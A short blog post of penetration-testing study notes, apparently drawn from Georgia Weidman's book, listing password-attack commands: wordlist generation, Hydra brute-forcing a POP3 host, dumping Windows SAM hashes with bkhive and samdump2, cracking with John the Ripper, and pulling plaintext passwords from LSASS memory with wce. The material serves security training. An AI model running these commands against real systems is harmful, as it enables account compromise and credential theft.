Source: Georgia Weidman on "Advanced Penetration Test" (1) Crunch Tool to bruteforce keyspace $: crunch 7 7 AB Bruteforces all 7 character passwords composed of only the characters A and B (2) ceWL Tool to map a website and pull potentially interesting words to add to a wordlist $: cewl -w [words].txt -d 1 -m 5 www.[website].com Depth 1 Minimum length of word is 5 characters (3) Hydra Online password cracking tool $: hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3 Offline Password Attacks (1) Opening the SAM File
We got access to a backup of the SAM and SYSTEM files with the directory traversal vulnerability. You can also get access to these files with physical access unless they have a BIOS password in place. $: bkhive system xpkey.txt $: samdump2 sam xpkey.txt (2) John the Ripper $: john xphashes.txt johnlinuxpasswords.txt --wordlist=passwordfile.txt (3) oclHashcat Can use GPUs to crack faster Online Password Cracking http://tools.question-defense.com http://cloudcracker.com Windows Credential Editor Tool to pull plaintext passwords etc out of the memory of the LSASS process *Have to drop the binary onto the system wce.exe -w
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
July 2016
Categories |